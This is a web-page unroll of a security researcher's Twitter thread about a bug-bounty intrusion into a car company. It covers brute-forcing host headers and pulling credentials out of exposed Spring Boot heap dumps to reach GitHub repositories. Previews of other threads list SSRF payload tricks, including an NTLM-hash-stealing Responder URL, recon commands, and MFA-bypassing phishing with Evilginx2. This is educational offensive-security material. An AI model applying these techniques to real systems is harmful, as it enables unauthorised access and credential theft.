Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Corben Leo Profile picture
@hacker_
Aug 21, 2023 12 tweets 4 min read Read on X
Scrolly
I hacked a car company.

Here's how I gained access to hundreds of their codebases.
1. This company ran a bug bounty program.

I came across a web server that responded with:

> 404 Not Found: Requested route ('example.apps.███.com')
2. This is likely an ingress controller.

Seeing "404 Not Found" and

• the Host header reflected in the response
• The word "route" in the response

Made me believe it was.

What's an ingress controller?
3. TL;DR: They route HTTP requests to different services.

Typically using the Host header and/or a path.

So, I started brute-forcing the host headers:

I got a hit:

> configurator-prod.apps.███.com Image
4. I wasn't sure what this was.

So, I brute-forced paths on the host:

$ ffuf -u ██/FUZZ -H "Host: configurator-prod.apps.███.com" -mc all

> /env – "200 OK"
> /heapdump – "200 OK"

It was running Spring Boot Actuator & it was misconfigured.
5. The /env endpoint didn't contain much.

I also couldn't POST to it to achieve RCE.

It did contain:

• A "config server" URL (config-server-UUID.apps.███)
• And an oauth2 endpoint + credentials (to authenticate to the referenced server)

But, the password was redacted. Image
6. Remember the "/heapdump" endpoint?

Heap dumps are a snapshot of objects in memory for an application.

That includes the credentials...

So, I grabbed the credentials by:
• Downloading the heap dump using wget.
• Running strings & grepping for the client secret

Got 'em. Image
7. Now, I wanted to:

• Use these oauth2 credentials
• Hit the newly found config server for "configurator-prod"
• Fuzz it for endpoints

So, I used the oauth2 endpoint (leaked in the accessTokenURI)

+ the leaked credentials and got an access token: Image
8. Then, I used it to access the config-server and fuzzed for endpoints.

Turns out, it was Spring Boot Actuator…

and misconfigured…again.

The /env & /heapdump endpoints were exposed. Image
9. In the /env response was Github credentials...

And the private key for the user.

I grabbed the password using the /heapdump endpoint:
Image
Image
10. I checked if the credentials were valid:

$ curl -u gops:abc123...

They were.

I could now access 30+ Github Orgs.

And I had read/write access to hundreds of repositories. github.example.com/api/v3/user
Image
11. I reported it to their bug bounty program.

Unfortunately didn't get a cool new car 😢

But I guess $5,000 wasn't too bad. Image

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Corben Leo

Corben Leo Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @hacker_

Corben Leo Profile picture
Mar 3, 2024
You can find easy critical vulnerabilities.

It just takes finding unique attack surfaces.

Here's an example of how you can, using a story of how I hacked a car company:
1/ I went to Shodan (or easy searching with )

Searched for my target with the filter:

> ssl.cert.subject\.cn:*.example[.]com

I found a server with a certificate for:

*.apps.███\.com

If I see wildcards, I think that the server is an ingress endpointcerts.io
2/ What's that?

Think load balancer. Routing hostnames (via the Host header) to their respective micro-service.

If you're confused, think of it as a magic door at a hotel:

• The door (load-balancer) has a list of names
• You tell the door your name & the door checks the list
Read 12 tweets
Corben Leo Profile picture
Aug 24, 2023
I've made $500k+ from SSRF vulnerabilities.

Here are my tricks: Image
1. Try other URL schemes:

• file:// (file read)
• netdoc:// (file read)
• dict://
• gopher://
• jar://
• ldap://
• and more!

You might be able to get file read.

Or send multi-line requests to gain additional impact

(Ex: gopher + redis = likely RCE)
2. Is the target running Windows?

Can't hit internal services?

(Well, try this even if you can)

Try to steal NTLM hashes with Responder.

/vulnerable?url=http://your-responder-host Image
Read 13 tweets
Corben Leo Profile picture
Jan 27, 2023
I hacked the military.

A system containing the information of military personnel.

Yet, the hack was done legally.

Here's how I did it and how it was done legally:
1. I came across an Army server running ASP .NET

The application was a Learning Management System (LMS).

If you’ve been in school in the past 10-15 years, you’ve likely used one: Moodle, Canvas, D2L, Blackboard, etc.

This LMS allowed anonymous registration.

So I registered!
2. I proxied my HTTP traffic through Burp Suite and started using the application.

I clicked every button, filled out forms, and even took a test.

Enumerating the site’s functionality.

The more you know about how an application works, the easier it is to find vulnerabilities.
Read 15 tweets
Corben Leo Profile picture
Jan 25, 2023
I hacked a car company last year.

I found a way to steal every customer's

• Name
• Email address
• Phone number
• Address

Here's how I did it:
1. I started with reconnaisance:

- Subdomain enumeration to find the company's subdomains.
- HTTP server probing to see what's online

$ subfinder -d example[dot]com | httpx -o target.httpx

I came across a webserver running IIS:

hxxps://installersupport.██████.com/
2. I wanted to know what files were on the host, without brute-forcing.

getallurls (gau) fetches known URLs from:

• AlienVault's Open Threat Exchange
• the Wayback Machine
• Common Crawl
• URLScan.

So I ran it against the domain:

$ gau installersupport.██████.com
Read 15 tweets
Corben Leo Profile picture
Jan 2, 2023
I hacked a large company (70k+ employees) through social engineering. Legally of course.

• I set up the infrastructure
• Scraped names & emails with LinkedIn
• Sent 200 phishing emails.

I had access to their AWS console within 2 minutes.

And much more:
1/ I used Evilnginx2 to bypass MFA (Okta & Duo)

From Okta, I could access Outlook, Sharepoint, Github, & many more services on behalf of the 50+ employees that fell for the phish.

I was blown away by how easy it was to pull off this "hack" that could've impacted 60M+ people.
2/ Phishing attacks are on the rise and are becoming more sophisticated.

Last year we saw Uber, Dropbox, Twilio, Axie Infinity ($625M theft), and more compromised through phishing.

People argue that humans are the "weakest link", yet, companies of all sizes still rely on:
Read 8 tweets
Corben Leo Profile picture
Dec 31, 2022
My favorite hacking stories of 2022:
1/ Hacking a Trans-Atlantic cable.

2/ Hacking a gaming company:

Read 12 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

Send Email!

:(